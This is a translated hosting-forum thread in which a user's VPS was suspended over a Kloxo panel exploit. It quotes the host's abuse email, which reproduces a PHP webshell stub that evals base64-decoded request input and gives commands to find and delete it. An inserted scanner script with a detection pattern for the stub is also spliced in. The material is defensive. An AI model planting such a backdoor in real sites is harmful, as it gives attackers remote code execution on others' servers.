宇宙主机交流论坛 (Universe Hosting Forum)

[Experience] Help: my VPS was suspended and they won't reactivate it...

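Posted on 2014-2-8 09:44:04
I went home for the New Year holiday and photonvps suspended my VPS. Now they flatly refuse to reactivate it and I don't know what to do. The website data on the VPS was not backed up before the holiday, and I want them to reactivate it so I can make a backup. The conversation is below. What should I do now?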


photonvps
This is an easy fix; give me the credentials and I'll fix it for you.




I now know there is a loophole in the VPS control panel, but now I cannot connect to repair it. I also want to back up the site data and then reinstall the VPS in the control panel. Can you help me open the VPS and let me do this operation?



photonvps
You are not reading the emails we sent you saying that your kloxo has an exploit that we needed you to clean? I am sorry, but if you ignore us we won't be able to help you with this type of abuse.
Your kloxo has an exploit; you needed to clean it but you ignored us, so we suspended you to stop attacks from your VM. If you want us to help you, give us your server credentials, otherwise we are going to terminate this account.




Why stop my VPS




photonvps
Hello,

Your account has been suspended because you did not respond to the abuse ticket within 24 hours.

Thank you.

Hello,

This is the abuse department sending you an important email alert of a backdoor botnet exploit with your kloxo panel that needs fixing ASAP!

This problem was brought to our attention by alerts that we received from banks that were receiving attacks from your control panel and other forms of virus detections.

Fortunately this exploit can be fixed by following the instructions listed below.

Find files that were modified on the 27th of this month.

find /home/kloxo/httpd/default/* -mtime -4 -iname "*.php"

You should get something similar to this

/home/kloxo/httpd/default/default.php
/home/kloxo/httpd/default/defuzx.php
/home/kloxo/httpd/default/emptzx.php


The defuzx.php and emptzx.php files were uploaded, and are the exploit that needs deleting.

You can inspect the backdoor code that was injected by the hacker to gain access to your account.


<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['36753c7000fab6fec6700cbf0ef8'])!=NULL){eval(base64_decode($_REQUEST['36753c7000fab6fec6700cbf0ef8']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>

To remove the exploit we do

rm -fr /home/kloxo/httpd/default/emptzx.php

rm -fr /home/kloxo/httpd/default/defuzx.php

Make sure to only delete the files that were modified on the 27th. The default.php file changed due to kloxo being hacked, so to fix that we need to update kloxo and change the admin password.

Update kloxo “/scripts/upcp”
Then finalize the fix by changing your kloxo admin panel password.
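
The check the abuse email walks through (list recently modified PHP files, then inspect them for the injected stub), combined into one report-only shell function. This is an added example, not part of the original post or of photonvps's email; the function names, the sample tree and the extension of the pattern to $_GET/$_POST/$_COOKIE are assumptions made here.

```shell
#!/bin/sh
# Added example: report recently modified PHP files that contain the
# eval(base64_decode($_REQUEST[...])) stub quoted in the email.
# Names below are hypothetical; nothing is deleted, paths are only printed.

# scan_webshells DIR [DAYS]  -> one suspicious path per line
scan_webshells() {
    dir=$1
    days=${2:-4}    # same window as the email's "-mtime -4"
    # -type f skips directories and symlinks. grep -l prints only file names.
    # The pattern tolerates whitespace and also matches the $_GET, $_POST
    # and $_COOKIE variants of the same one-line stub (assumption: a wider
    # net than the single sample on the page).
    find "$dir" -type f -iname '*.php' -mtime "-$days" -exec grep -lEi \
        'eval[[:space:]]*\([[:space:]]*base64_decode[[:space:]]*\([[:space:]]*\$_(REQUEST|GET|POST|COOKIE)' \
        {} + 2>/dev/null || :    # "no match" is not an error
}

# Constructed sample tree (not real Kloxo files) so the script runs offline.
make_sample() {
    d=$(mktemp -d)
    # Clean file: must not be reported.
    printf '%s\n' '<?php echo "hello"; ?>' > "$d/default.php"
    # Same shape as the stub in the email, with a constructed parameter name.
    printf '%s\n' '<?php if($_REQUEST["k"]!=NULL){eval(base64_decode($_REQUEST["k"]));} ?>' \
        > "$d/stub.php"
    # Identical content but an old mtime: outside a 4-day window.
    cp "$d/stub.php" "$d/old.php"
    touch -t 201401010000 "$d/old.php"
    printf '%s\n' "$d"
}

sample=$(make_sample)
scan_webshells "$sample" 4    # prints only the path of stub.php
rm -rf "$sample"
```

The old.php case shows the limit of the time filter: the same stub with an older modification time is missed by a 4-day window, so a wider DAYS value is worth running before trusting a clean result.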
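Posted on 2014-2-8 09:48:25
It doesn't look like they said they won't reactivate it, does it? They're asking you to fix the vulnerability?
OP | Posted on 2014-2-8 09:50:49
分享吧 posted on 2014-2-8 09:48
It doesn't look like they said they won't reactivate it, does it? They're asking you to fix the vulnerability?

The problem is that I can't connect, so I can't fix it.
OP | Posted on 2014-2-8 09:52:21

It seems to be a panel problem: KLOXO has a vulnerability and it wasn't fixed in time.
Posted on 2014-2-8 09:59:23
vielang posted on 2014-2-8 09:50
The problem is that I can't connect, so I can't fix it.

OK, I'm out of ideas..
Posted on 2014-2-8 11:20:18
Kloxo has been collectively wrecked lately.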